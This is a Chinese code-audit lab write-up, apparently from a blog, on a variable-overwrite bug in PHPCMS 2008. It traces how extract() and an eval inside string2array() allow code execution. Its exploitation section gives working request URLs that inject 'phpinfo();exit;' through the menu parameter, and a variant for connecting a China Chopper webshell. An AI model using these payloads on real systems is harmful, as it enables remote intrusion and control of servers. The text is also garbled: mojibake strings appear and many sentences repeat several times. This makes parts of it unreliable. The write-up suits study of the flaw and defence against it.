一、 启动环境

1.双击运行桌面phpstudy.exe软件



2.点击启动按钮,启动服务器环境

二、代码审计

1.双击启动桌面Seay源代码审计系统软件



3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\ phpcms 2008),点击确定

漏洞分析

1.点击展开/yp/web/include/common.inc.php

<?php

defined('IN_PHPCMS') or exit('Access Denied');

$userid = $userid ? $userid : intval(QUERY_STRING);

$r = $db->get_one("SELECT * FROM `".DB_PRE."member_company` WHERE `userid`='$userid'");

if($r)

{

	extract($r);

}

if(!$userid)

{

	$MS['title'] = '浣犺璁块棶鐨勭珯鐐逛笉瀛樺湪';

	$MS['description'] = '璇锋牳瀵圭綉鍧€鏄惁姝g‘.';

	$MS['urls'][0] = array(

		'name'=>'璁块棶缃戠珯棣栭〉',

		'url'=>$PHPCMS['siteurl'],

		);

	$MS['urls'][1] = array(

		'name'=>'娉ㄥ唽涓烘湰绔欎細鍛?,

		'url'=>$PHPCMS['siteurl'].'member/register.php',

		);

	msg($MS);

}

程序首先赋值一个userid变量,然后使用赋值完成变量拼接sql语句执行,SQL语句执行完成以后返回数据给userid变量,然后使用赋值完成变量拼接sql语句执行,SQL语句执行完成以后返回数据给userid变量,然后使用赋值完成变量拼接sql语句执行,SQL语句执行完成以后返回数据给r变量数组,如果r变量存在内容,则将变量数组内容加入到当前文件的符号表中。如果r变量存在内容,则将变量数组内容加入到当前文件的符号表中。如果r变量存在内容,则将变量数组内容加入到当前文件的符号表中。如果userid变量内容为false则将显示错误页面内容,但是目前userid并没有找到在哪里获取。2.如果userid并没有找到在哪里获取。
2.如果userid并没有找到在哪里获取。2.如果userid不为false,则接着往下执行

if(empty($tplname)) $tplname = 'default';

//用户选择的默认模板

$companytpl_config = include PHPCMS_ROOT.'templates/'.TPL_NAME.'/yp/companytplnames.php';

$tpl = $companytpl_config[$tplname]['tplname'];

define('TPL', $tpl);

define('WEB_SKIN', 'templates/'.TPL_NAME.'/yp/css/');

if($diy)

{

	define('SKIN_DIY', WEB_SKIN.$userid.'_diy.css');

}

else

{

	define('SKIN_DIY', WEB_SKIN.$companytpl_config[$tplname]['style']);

}

$menu = string2array($menu);

代码接着进行初始化模板文件,最后将menu变量传输到string2array()函数,目前又来疑问,menu变量传输到string2array()函数,目前又来疑问,menu变量传输到string2array()函数,目前又来疑问,menu变量从何而来?

3.现在需要了解一下string2array()到底什么作用,string2array函数存放在include/global.func.php

function string2array($data)

{

	if($data == '') return array();

	eval("\$array = $data;");

	return $array;

}

看到函数发现,内部有eval敏感函数,并且把传送过去的menu进行执行,现在有这么个假设,如果menu进行执行,现在有这么个假设,如果menu进行执行,现在有这么个假设,如果menu变量可以控制,那么完全进行任意代码执行。

4.目前成立这个假设userid主要是为了去数据库查询内容,然后将返回的内容构成一个数组,使用extract()将数组的内容添加到当前符号表中,从而也就生成userid主要是为了去数据库查询内容,然后将返回的内容构成一个数组,使用extract()将数组的内容添加到当前符号表中,从而也就生成userid主要是为了去数据库查询内容,然后将返回的内容构成一个数组,使用extract()将数组的内容添加到当前符号表中,从而也就生成menu变量,如果能够让数据库返回空,不让他覆盖或者生成新的menu变量,然后在别的位置生成新的menu变量,然后在别的位置生成新的menu变量,然后在别的位置生成新的menu变量,从而执行想执行代码。

5.在include/common.inc.php文件中,会将GET、POST、Cookie转换成变量

if($_REQUEST)

{

	if(MAGIC_QUOTES_GPC)

	{

		$_REQUEST = new_stripslashes($_REQUEST);

		if($_COOKIE) $_COOKIE = new_stripslashes($_COOKIE);

		extract($db->escape($_REQUEST), EXTR_SKIP);

	}

	else

	{

		$_POST = $db->escape($_POST);

		$_GET = $db->escape($_GET);

		$_COOKIE = $db->escape($_COOKIE);

		@extract($_POST,EXTR_SKIP);

		@extract($_GET,EXTR_SKIP);

		@extract($_COOKIE,EXTR_SKIP);

	}

	if(!defined('IN_ADMIN')) $_REQUEST = filter_xss($_REQUEST, ALLOWED_HTMLTAGS);

	if($_COOKIE) $db->escape($_COOKIE);

}

所以可以利用这个位置提前生成menu变量和menu变量和menu变量和userid变量,并且把userid内容置位数据库不存在的内容,userid内容置位数据库不存在的内容,userid内容置位数据库不存在的内容,menu变量内容为想要执行的代码。

漏洞利用

1.访问

http://192.168.91.136/phpcms/yp/web/index.php?userid=1234324&menu=phpinfo();exit;

菜刀直接连接

http://192.168.91.136/phpcms/yp/web/index.php?userid=1234324&menu=exit;

//密码 menu

phpcms 2008 变量覆盖漏洞的更多相关文章

  1. php之变量覆盖漏洞讲解

    1.变量没有初始化的问题(1): wooyun连接1:[link href="WooYun: PHPCMS V9 member表内容随意修改漏洞"]tenzy[/link] $up ...

  2. ctf变量覆盖漏洞:

    1.变量覆盖: ①:针对extract函数的变量覆盖漏洞: <?php @error_reporting(E_ALL^E_NOTICE); require('config.php'); if($ ...

  3. PHP代码审计笔记--变量覆盖漏洞

    变量覆盖指的是用我们自定义的参数值替换程序原有的变量值,一般变量覆盖漏洞需要结合程序的其它功能来实现完整的攻击. 经常导致变量覆盖漏洞场景有:$$,extract()函数,parse_str()函数, ...

  4. 变量覆盖漏洞学习及在webshell中的运用

    一.发生条件: 函数使用不当($$.extract().parse_str().import_request_variables()等) 开启全局变量 二.基础了解: 1.$$定义 $$代表可变变量, ...

  5. 7. 由一道ctf学习变量覆盖漏洞

    0×00 背景 近期在研究学习变量覆盖漏洞的问题,于是就把之前学习的和近期看到的CTF题目中有关变量覆盖的题目结合下进一步研究. 通常将可以用自定义的参数值替换原有变量值的情况称为变量覆盖漏洞.经常导 ...

  6. Web安全之变量覆盖漏洞

    通常将可以用自定义的参数值替换原有变量值的情况称为变量覆盖漏洞.经常导致变量覆盖漏洞场景有:$$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_reques ...

  7. 代码审计-MetInfo CMS变量覆盖漏洞

    0x01 代码分析 安装好后是这样的 漏洞文件地址\include\common.inc.php 首先是在这个文件发现存在变量覆盖的漏洞 foreach(array('_COOKIE', '_POST ...

  8. CTF——代码审计之变量覆盖漏洞writeup【2】

    题目: 基础: 所需基础知识见变量覆盖漏洞[1]  分析: 现在的$a=’hi’,而下面的函数需满足$a=’jaivy’才可以输出flag,那么需要做的事就是想办法覆盖掉$a原来的值. 那么出现的提示 ...

  9. 2020/2/1 PHP代码审计之变量覆盖漏洞

    0x00 变量覆盖简介 变量覆盖是指变量未被初始化,我们自定义的参数值可以替换程序原有的变量值. 0x01 漏洞危害 通常结合程序的其他漏洞实现完整的攻击,比如文件上传页面,覆盖掉原来白名单的列表,导 ...

随机推荐

  1. Solution -「LOCAL」「cov. 牛客多校 2020 第三场 I」礼物

    \(\mathcal{Description}\)   给定排列 \(\{a_n\}\),求字典序第 \(K\) 大的合法排列 \(\{b_n\}\).称一个排列 \(\{p_n\}\) 合法,当且仅 ...

  2. 虚拟机搭建web服务器

    下载CentOS镜像 下载网址:阿里云镜像 选择版本(这里我使用的7) 选择isos/ 选择Minimal.iso,这个版本是最小镜像安装:没有图像界面 只有命令行 将CentOS安装到VM16中 注 ...

  3. Zookeeper开源客户端Curator之创建会话

    前面Zookeeper的链接使用的都是其提供的原生代码,实际开发过程中非常底层的细节开发工作如连接重连,反复注册等耗费开发人员大量的工作精力并且重复工作.而开源客户端Curator的出现解决了该类问题 ...

  4. Redis——入门学习笔记

    Redis学习 说到前面:这篇笔记只是我作为一个Redis新手,从0到认知的一个过程.后续会持续深入学习. 学习初衷和计划 学习Redis,因为这是热门技术,必须掌握的技术,别人都会我不会.就这一点就 ...

  5. #刷题记录--剑指 Offer 07. 重建二叉树

    输入某二叉树的前序遍历和中序遍历的结果,请重建该二叉树.假设输入的前序遍历和中序遍历的结果中都不含重复的数字. 抓住一点,通过递归进行节点创建时,是按照 前序遍历数组 进行创建的. 根节点,根节点的左 ...

  6. C#?和??运算符以及合并条件表达式

    最近项目中,常常碰到这个?和??这两个操作符,之前说得不够详细,趁着周末补全来,希望能够给大家带来帮助. (一)?操作符 我们知道值类型是不肯能为空的,它总是包含值的本身,不会为NULL,这估计也是值 ...

  7. PyTorch深度学习实践——处理多维特征的输入

    处理多维特征的输入 课程来源:PyTorch深度学习实践--河北工业大学 <PyTorch深度学习实践>完结合集_哔哩哔哩_bilibili 这一讲介绍输入为多维数据时的分类. 一个数据集 ...

  8. 反射、静态代理、动态代理(jdk、cglib)

    一.反射 反射在之前的文章中详细的解释过了,简单概括就是:可以动态的获取到一个类内部的所有的信息,动态的去创建对象和使用对象以及可以操作对象的属性和方法. 二.代理 首先解释一下代理:使用一个代理对象 ...

  9. Liunxa安装Nignx,Git

    Linux安装Nignx 1.安装依赖 执行语句 yum install gcc patch libffi-devel python-devel zlib-devel bzip2-devel open ...

  10. 『现学现忘』Docker相关概念 — 4、虚拟化概念

    目录 1.虚拟化的概念 2.为什么出现虚拟化 3.虚拟化技术 1.虚拟化的概念 虚拟化是指通过虚拟化技术将计算机虚拟为多台逻辑计算机.在一台计算机上同时运行多个逻辑计算机,每个逻辑计算机可运行不同的操 ...